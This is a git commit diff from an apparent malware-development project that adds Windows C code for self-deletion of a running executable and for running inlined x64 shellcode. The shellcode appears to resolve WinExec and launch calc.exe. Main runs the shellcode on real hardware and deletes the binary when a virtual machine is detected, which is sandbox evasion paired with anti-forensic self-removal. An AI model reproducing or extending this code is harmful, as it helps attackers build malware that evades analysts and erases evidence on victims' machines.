Implemented InlinedShellcodeExecution and DeleteSelfFromDisk functions

This commit is contained in:
0xtriboulet
2024-08-17 16:35:16 -04:00
parent acbc912368
commit b88005548e
7 changed files with 83 additions and 2 deletions
BIN
View File
Binary file not shown.
+1
View File
@@ -0,0 +1 @@
BOOL DeleteSelfFromDisk();
+1
View File
@@ -0,0 +1 @@
VOID InlinedShellcodeExecution();
+3 -1
View File
@@ -15,4 +15,6 @@
#include "GetProcessCountViaSnapShot.h"
#include "GetUniqueUserCountViaSnapshot.h"
#include "AbsoluteValue.h"
#include "VmDetection.h"
#include "VmDetection.h"
#include "InlinedShellcodeExecution.h"
#include "DeleteSelfFromDisk.h"
+67
View File
@@ -0,0 +1,67 @@
/*
* Strongly based on the implementation available on maldevacademy.com
*/
#include "intelligence.h"
// Custom FILE_RENAME_INFO structure definition
typedef struct _FILE_RENAME_INFO_EX {
#if (_WIN32_WINNT >= _WIN32_WINNT_WIN10_RS1)
union {
BOOLEAN ReplaceIfExists;
DWORD Flags;
} DUMMYUNIONNAME;
#else
BOOLEAN ReplaceIfExists;
#endif
HANDLE RootDirectory;
DWORD FileNameLength;
WCHAR FileName[MAX_PATH]; // Instead of FileName[1]
} FILE_RENAME_INFO_EX, * PFILE_RENAME_INFO_EX;
BOOL DeleteSelfFromDisk() {
CONST WCHAR NEW_STREAM[7] = L":%x%x\x00";
BOOL bSTATE = FALSE;
WCHAR szFileName[MAX_PATH * 2] = { 0x00 };
FILE_RENAME_INFO_EX FileRenameInfo_Ex = { .ReplaceIfExists = FALSE, .RootDirectory = 0x00 , .FileNameLength = sizeof(NEW_STREAM)};
FILE_DISPOSITION_INFO FileDisposalInfo = { .DeleteFile = TRUE };
HANDLE hLocalImgFileHandle = INVALID_HANDLE_VALUE;
if (GetModuleFileNameW(NULL, szFileName, (MAX_PATH * 2)) == 0x00) {
PRINT("[!] GetModuleFileNameW Failed With Error: %ld \n", GetLastError());
goto _END_OF_FUNC;
}
swprintf(FileRenameInfo_Ex.FileName, MAX_PATH, NEW_STREAM, rand(), rand() * rand());
if ((hLocalImgFileHandle = CreateFileW(szFileName, DELETE | SYNCHRONIZE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0x0, NULL)) == INVALID_HANDLE_VALUE) {
PRINT("[!] CreateFileW [%d] Failed With Error: %ld \n", __LINE__, GetLastError());
goto _END_OF_FUNC;
}
if (!SetFileInformationByHandle(hLocalImgFileHandle, FileRenameInfo, &FileRenameInfo_Ex, sizeof(FILE_RENAME_INFO_EX))) {
PRINT("[!] SetFileInformationByHandle [%d] Failed With Error: %ld \n", __LINE__, GetLastError());
goto _END_OF_FUNC;
}
CloseHandle(hLocalImgFileHandle);
if ((hLocalImgFileHandle = CreateFileW(szFileName, DELETE | SYNCHRONIZE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0x0, NULL)) == INVALID_HANDLE_VALUE) {
PRINT("[!] CreateFileW [%d] Failed With Error: %ld \n", __LINE__, GetLastError());
goto _END_OF_FUNC;
}
if (!SetFileInformationByHandle(hLocalImgFileHandle, FileDispositionInfo, &FileDisposalInfo, sizeof(FileDisposalInfo))) {
PRINT("[!] SetFileInformationByHandle [%d] Failed With Error: %ld \n", __LINE__, GetLastError());
goto _END_OF_FUNC;
}
bSTATE = TRUE;
_END_OF_FUNC:
if (hLocalImgFileHandle != INVALID_HANDLE_VALUE)
CloseHandle(hLocalImgFileHandle);
return bSTATE;
}
+8
View File
@@ -0,0 +1,8 @@
void InlinedShellcodeExecution(){
// Inlined shellcode. IRL this should be injected somewhere, somehow
asm(".byte 0x48,0x31,0xff,0x48,0xf7,0xe7,0x65,0x48,0x8b,0x58,0x60,0x48,0x8b,0x5b,0x18,0x48,0x8b,0x5b,0x20,0x48,0x8b,0x1b,0x48,0x8b,0x1b,0x48,0x8b,0x5b,0x20,0x49,0x89,0xd8,0x8b,0x5b,0x3c,0x4c,0x01,0xc3,0x48,0x31,0xc9,0x66,0x81,0xc1,0xff,0x88,0x48,0xc1,0xe9,0x08,0x8b,0x14,0x0b,0x4c,0x01,0xc2,0x4d,0x31,0xd2,0x44,0x8b,0x52,0x1c,0x4d,0x01,0xc2,0x4d,0x31,0xdb,0x44,0x8b,0x5a,0x20,0x4d,0x01,0xc3,0x4d,0x31,0xe4,0x44,0x8b,0x62,0x24,0x4d,0x01,0xc4,0xeb,0x32,0x5b,0x59,0x48,0x31,0xc0,0x48,0x89,0xe2,0x51,0x48,0x8b,0x0c,0x24,0x48,0x31,0xff,0x41,0x8b,0x3c,0x83,0x4c,0x01,0xc7,0x48,0x89,0xd6,0xf3,0xa6,0x74,0x05,0x48,0xff,0xc0,0xeb,0xe6,0x59,0x66,0x41,0x8b,0x04,0x44,0x41,0x8b,0x04,0x82,0x4c,0x01,0xc0,0x53,0xc3,0x48,0x31,0xc9,0x80,0xc1,0x07,0x48,0xb8,0x0f,0xa8,0x96,0x91,0xba,0x87,0x9a,0x9c,0x48,0xf7,0xd0,0x48,0xc1,0xe8,0x08,0x50,0x51,0xe8,0xb0,0xff,0xff,0xff,0x49,0x89,0xc6,0x48,0x31,0xc9,0x48,0xf7,0xe1,0x50,0x48,0xb8,0x9c,0x9e,0x93,0x9c,0xd1,0x9a,0x87,0x9a,0x48,0xf7,0xd0,0x50,0x48,0x89,0xe1,0x48,0xff,0xc2,0x48,0x83,0xec,0x20,0x41,0xff,0xd6;");
}
+3 -1
View File
@@ -19,11 +19,13 @@ int main(){
// TODO: ShellcodeDetonation
PRINT("[i] Executing shellcode!\n");
InlinedShellcodeExecution();
}else{
// TODO: SelfDelete
PRINT("[i] Self-deleting!\n");
PRINT("[i] VM Detected. Self-deleting!\n");
DeleteSelfFromDisk();
}